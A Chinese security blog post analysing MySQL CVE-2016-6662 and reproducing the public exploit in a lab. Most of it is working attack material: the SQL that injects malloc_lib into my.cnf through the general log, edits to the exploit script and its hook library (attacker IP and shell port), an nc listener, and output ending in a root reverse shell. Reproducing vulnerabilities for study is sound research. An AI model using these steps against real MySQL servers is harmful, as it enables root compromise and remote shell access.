本文作者:安全小飞侠,原文链接:http://avfisher.win/archives/593
2016年9月12日,国外安全研究人员Dawid Golunski发布安全公告发现了MySQL的一个可被远程代码执行/权限提升的漏洞(CVE-2016-6662)。笔者在研究了原报告后,做了如下分析和实践。
漏洞披露原址:http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html
影响范围 (漏洞作者9月16日的最新更新):
MySQL <= 5.7.14 MySQL <= 5.6.32 MySQL <= 5.5.51
在对原报告的研究后,整理总结如下。
漏洞产生的原因:
–malloc-lib = LIB
/usr/local/mysql/bin/mysqld_safe:
# set_malloc_lib LIB
# - If LIB is empty, do nothing and return
# - If LIB is 'tcmalloc', look for tcmalloc shared library in /usr/lib
# then pkglibdir. tcmalloc is part of the Google perftools project.
# - If LIB is an absolute path, assume it is a malloc shared library
#
# Put LIB in mysqld_ld_preload, which will be added to LD_PRELOAD when
# running mysqld. See ld.so for details.
set_malloc_lib() {
malloc_lib="$1"
if [ "$malloc_lib" = tcmalloc ]; then
pkglibdir=`get_mysql_config --variable=pkglibdir`
malloc_lib=
# This list is kept intentionally simple. Simply set --malloc-lib
# to a full path if another location is desired.
for libdir in /usr/lib "$pkglibdir" "$pkglibdir/mysql"; do
for flavor in _minimal '' _and_profiler _debug; do
tmp="$libdir/libtcmalloc$flavor.so"
#log_notice "DEBUG: Checking for malloc lib '$tmp'"
[ -r "$tmp" ] || continue
malloc_lib="$tmp"
break 2
done
done
if [ -z "$malloc_lib" ]; then
log_error "no shared library for --malloc-lib=tcmalloc found in /usr/lib or $pkglibdir"
exit 1
fi
fi
3.共享库文件可被添加在一个mysql的配置文件my.cnf中, 比如mysql的data目录,$DATADIR/my.cnf
/usr/local/mysql/bin/mysqld_safe:
# Try where the binary installs put it
if test -d $MY_BASEDIR_VERSION/data/mysql
then
DATADIR=$MY_BASEDIR_VERSION/data
if test -z "$defaults" -a -r "$DATADIR/my.cnf"
then
defaults="--defaults-extra-file=$DATADIR/my.cnf"
fi
# Next try where the source installs put it
elif test -d $MY_BASEDIR_VERSION/var/mysql
then
DATADIR=$MY_BASEDIR_VERSION/var
# Or just give up and use our compiled-in default
else
DATADIR=/usr/local/mysql/data
fi
4.一旦攻击者可以注入恶意库文件在my.cnf文件中,即可在mysql服务重启时以root权限执行预加载的任意共享库中的任意代码
漏洞的利用条件:
具有FILE和SELECT权限的mysql的用户且能够访问日志功能(通常情况下只有MYSQL的管理员用户具有)
漏洞的利用场景:
在MYSQL已存在的具有弱权限或者权限设置不安全的配置文件(mysql用户可写)里注入恶意代码
在MYSQL的data目录里(mysql用户默认可写)创建一个新的配置文件my.cnf,并注入恶意代码
漏洞的利用原理:
1.使用mysql的日志记录功能创建/修改my.cnf文件
mysql> set global general_log_file = '/usr/local/mysql/data/my.cnf';
mysql> set global general_log = on;
mysql> select '
'>
'> ; injected config entry
'>
'> [mysqld]
'> malloc_lib=/tmp/mysql_exploit_lib.so
'>
'> [separator]
'>
'> ';
1 row in set (0.00 sec)
mysql> set global general_log = off;
2.注入包涵恶意代码的共享库,并添加到my.cnf文件的[mysqld]下,如:
[mysqld]
malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'
3.重启mysql服务,即可实现以root权限执行恶意代码
实验环境:
实践步骤:
安装后目录如下:
root@ubuntu:/home/avfisher/avfisher# ls -l /usr/local/mysql/
total 72
drwxr-xr-x 2 mysql mysql 4096 9月 18 18:51 bin
-rw-r--r-- 1 mysql mysql 17987 5月 16 17:46 COPYING
drwx------ 6 mysql mysql 4096 9月 18 17:46 data
drwxr-xr-x 2 mysql mysql 4096 9月 13 23:58 docs
drwxr-xr-x 3 mysql mysql 4096 9月 13 19:17 include
-rw-r--r-- 1 mysql mysql 301 5月 16 17:46 INSTALL-BINARY
drwxr-xr-x 3 mysql mysql 4096 9月 13 19:17 lib
drwxr-xr-x 4 mysql mysql 4096 9月 13 19:17 man
drwxr-xr-x 10 mysql mysql 4096 9月 13 19:17 mysql-test
-rw-r--r-- 1 mysql mysql 2496 5月 16 17:46 README
drwxr-xr-x 2 mysql mysql 4096 9月 13 19:17 scripts
drwxr-xr-x 27 mysql mysql 4096 9月 13 19:17 share
drwxr-xr-x 4 mysql mysql 4096 9月 13 23:02 sql-bench
drwxr-xr-x 2 mysql mysql 4096 9月 18 17:52 support-files
2. 下载exp文件:
3. 查找mysql的data目录,如:/usr/local/mysql/data
root@ubuntu:/home/avfisher/avfisher# ps aux | grep mysqld_safe
root 12592 0.0 0.0 4508 1780 pts/18 S 17:46 0:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/data --pid-file=/usr/local/mysql/data/ubuntu.pid
root 13622 0.0 0.0 21296 940 pts/18 S+ 18:59 0:00 grep --color=auto mysqld_saf
4. 修改exp文件
0ldSQL_MySQL_RCE_exploit.py:修改161行如下 (注意:此处的作用是将mysql的触发器文件写入到测试数据库所在的同一目录下)
TRG_path="/usr/local/mysql/data/%s/poctable.TRG" % args.TARGET_DB
mysql_hookandroot_lib.c:修改63-65行如下 (此处笔者使用的my.cnf的目录是/usr/local/mysql/data/my.cnf)
#define ATTACKERS_IP "<你的监听服务器的IP>"
#define SHELL_PORT <你的监听端口>
#define INJECTED_CONF "<你的mysql的data目录下的my.cnf文件>"
5.在监听服务器上启动监听
[root@centos ~]# nc -lvv 8080
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
6.创建测试数据库用户和数据库
CREATE DATABASE pocdb;
GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY 'p0cpass!';
GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%';
7.执行0ldSQL_MySQL_RCE_exploit.py脚本如下:
root@ubuntu:/home/avfisher/avfisher# python 0ldSQL_MySQL_RCE_exploit.py -dbuser attacker -dbpass p0cpass! -dbhost 127.0.0.1 -dbname pocdb -mycnf /usr/local/mysql/data/my.cnf
0ldSQL_MySQL_RCE_exploit.py (ver. 1.0)
(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit
For testing purposes only. Do no harm.
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
[+] Connecting to target server 127.0.0.1 and target mysql account '[email protected]' using DB 'pocdb'
[+] The account in use has the following grants/perms:
GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY PASSWORD <secret>
GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%'
[+] Compiling mysql_hookandroot_lib.so
[+] Converting mysql_hookandroot_lib.so into HEX
[+] Saving trigger payload into /usr/local/mysql/data/pocdb/poctable.TRG
[+] Dumping shared library into /var/lib/mysql/mysql_hookandroot_lib.so file on the target
[+] Creating table 'poctable' so that injected 'poctable.TRG' trigger gets loaded
[+] Inserting data to `poctable` in order to execute the trigger and write data to the target mysql config /usr/local/mysql/data/my.cnf
[+] Showing the contents of /usr/local/mysql/data/my.cnf config to verify that our setting (malloc_lib) got injected
...
[+] Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :)
[+] Everything is set up and ready. Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell... :)
...
8.重启mysql服务来触发利用
root@ubuntu:/home/avfisher/avfisher# /usr/local/mysql/support-files/mysql.server restart
9.监听服务器成功收到反弹shell
[root@centos ~]# nc -lvv 8080
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.1.92.
Ncat: Connection from 192.168.1.92:46192.
root@ubuntu:/usr/local/mysql# id
id
uid=0(root) gid=0(root) groups=0(root)
笔者在该漏洞的测试和实践过程中,有如下的体会和心得:
漏洞作者巧妙地利用了触发器,使一个普通的用户利用了root权限执行了所需的sql语句,从而成功地绕过了mysql对于general_log_file文件操作的权限限制
漏洞作者提供了一个不错的反弹shell的技巧,即在mysqld启动之前利用preload加载my.cnf文件顺序早于mysqld成功地修改了my.cnf文件中的冗余信息,保证了mysql服务的正常启动
关于mysql的data目录下的my.cnf文件的权限问题,其实完全不需要chown mysql:mysql my.cnf, 只要同时具备以下2个条件即可:
默认的mysql用户对my.cnf具有可写权限
http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html
http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py
http://legalhackers.com/exploits/mysql_hookandroot_lib.c
http://seclists.org/oss-sec/2016/q3/484
原文地址:http://avfisher.win/archives/593